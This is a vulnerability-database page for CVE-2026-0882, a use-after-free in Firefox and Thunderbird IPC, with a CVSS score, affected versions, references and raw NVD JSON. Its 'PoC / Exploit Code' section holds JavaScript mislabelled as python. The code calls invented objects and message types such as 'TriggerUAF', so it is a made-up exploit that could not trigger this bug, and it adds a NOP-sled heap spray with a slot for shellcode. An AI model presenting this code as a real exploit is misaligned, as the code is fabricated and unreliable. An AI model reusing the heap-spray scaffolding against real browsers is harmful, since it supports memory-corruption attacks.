CVE-2026-0882

Description

Use-after-free in the IPC component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE

Mozilla Firefox < 147

Mozilla Firefox ESR 115.x < 115.32

Mozilla Firefox ESR 140.x < 140.7

Mozilla Thunderbird < 147

Mozilla Thunderbird ESR < 140.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-0882 PoC - Use-after-free in IPC Component
// This is a conceptual PoC for educational purposes only

const poc = {
  target: 'Firefox/Thunderbird IPC UAF',
  cve: 'CVE-2026-0882',
  
  // Trigger the UAF condition
  triggerUAF: function() {
    // Step 1: Create IPC message handlers
    const ipcChannel = new BrowserChildProcess();
    
    // Step 2: Manipulate message queue to trigger race condition
    for (let i = 0; i < 1000; i++) {
      ipcChannel.send('IPCMessage', {
        type: 'TriggerUAF',
        data: new ArrayBuffer(1024 * 1024) // Large buffer
      });
      
      // Force garbage collection to free memory
      if (i % 100 === 0) {
        gc();
      }
    }
    
    // Step 3: Heap spray to control freed memory
    this.heapSpray();
    
    // Step 4: Trigger access to freed object
    ipcChannel.send('IPCMessage', {
      type: 'AccessFreedMemory'
    });
  },
  
  // Heap spraying technique
  heapSpray: function() {
    const spraySize = 0x100000; // 1MB
    const sprayData = new Uint8Array(spraySize);
    
    // Fill with NOP sled and shellcode
    for (let i = 0; i < spraySize - 100; i++) {
      sprayData[i] = 0x90; // NOP
    }
    
    // Place shellcode at the end
    const shellcode = [/* your shellcode here */];
    for (let i = 0; i < shellcode.length; i++) {
      sprayData[spraySize - 100 + i] = shellcode[i];
    }
    
    // Spray the heap
    for (let i = 0; i < 100; i++) {
      new Uint8Array(spraySize).set(sprayData);
    }
  }
};

// Execute trigger
poc.triggerUAF();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0882
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0882
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0882/
[4] VulDB https://vuldb.com/cve/CVE-2026-0882
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=1924125
[6] https://www.mozilla.org/security/advisories/mfsa2026-01/
[7] https://www.mozilla.org/security/advisories/mfsa2026-02/
[8] https://www.mozilla.org/security/advisories/mfsa2026-03/
[9] https://www.mozilla.org/security/advisories/mfsa2026-04/
[10] https://www.mozilla.org/security/advisories/mfsa2026-05/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0882", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:38.750", "lastModified": "2026-04-13T15:17:17.050", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use-after-free in the IPC component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Uso después de liberación en el componente IPC. Esta vulnerabilidad afecta a Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, y Thunderbird < 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1924125", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}